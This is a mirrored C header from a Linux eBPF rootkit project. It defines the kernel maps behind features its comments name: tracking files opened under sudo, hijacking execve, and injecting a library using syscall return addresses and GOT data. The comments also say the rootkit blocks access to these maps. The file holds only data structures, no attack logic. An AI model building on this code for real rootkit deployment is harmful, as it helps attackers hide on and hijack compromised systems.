mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-18 15:53:08 +08:00
63 lines
1.6 KiB
C
63 lines
1.6 KiB
C
#ifndef __BPF_MAP_DEFS_H
|
|
#define __BPF_MAP_DEFS_H
|
|
|
|
#include "headervmlinux.h"
|
|
|
|
//Tasks and comms
|
|
#define TASK_COMM_LEN 16
|
|
|
|
|
|
/*PRIVATE MAPS*/
|
|
//Any attempt to access these maps will be blocked by the rookit
|
|
|
|
//File system data of a running program which opened some fd
|
|
#define FS_OPEN_DATA_PROGRAM_NAME_SIZE 16
|
|
#define FS_OPEN_DATA_FILENAME_SIZE 16
|
|
|
|
struct fs_open_data{ //Map value
|
|
char* buf;
|
|
int fd;
|
|
__u32 pid;
|
|
char program_name[FS_OPEN_DATA_PROGRAM_NAME_SIZE];
|
|
char filename[FS_OPEN_DATA_FILENAME_SIZE];
|
|
int is_sudo;
|
|
};
|
|
|
|
struct inj_ret_address_data{ //Map value
|
|
__u64 libc_syscall_address;
|
|
__u64 stack_ret_address;
|
|
__u64 relro_active;
|
|
__u64 got_address;
|
|
__s32 got_offset;
|
|
__s32 padding;
|
|
};
|
|
|
|
struct fs_priv_open{ //Map
|
|
__uint(type, BPF_MAP_TYPE_HASH);
|
|
__uint(max_entries, 4096);
|
|
__type(key, __u64); //thread group id(MSB) + pid (LSB)
|
|
__type(value, struct fs_open_data);
|
|
} fs_open SEC(".maps");
|
|
|
|
|
|
//State of the execve hijacker. 0 inactive, 1 active
|
|
struct exec_var_priv_hijack_active{ //Map
|
|
__uint(type, BPF_MAP_TYPE_HASH);
|
|
__uint(max_entries, 1);
|
|
__type(key, __u64);
|
|
__type(value, __u64);
|
|
} exec_var_hijack_active SEC(".maps");
|
|
|
|
//Return addresses of syscalls in the shared library, for the library injection
|
|
struct inj_priv_ret_address{ //Map
|
|
__uint(type, BPF_MAP_TYPE_HASH);
|
|
__uint(max_entries, 4096);
|
|
__type(key, __u64); //thread group id(MSB) + pid (LSB)
|
|
__type(value, struct inj_ret_address_data);
|
|
} inj_ret_address SEC(".maps");
|
|
|
|
/*PROTECTED MAPS*/
|
|
//Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted
|
|
//Located at /src/map_prot.h
|
|
|
|
#endif |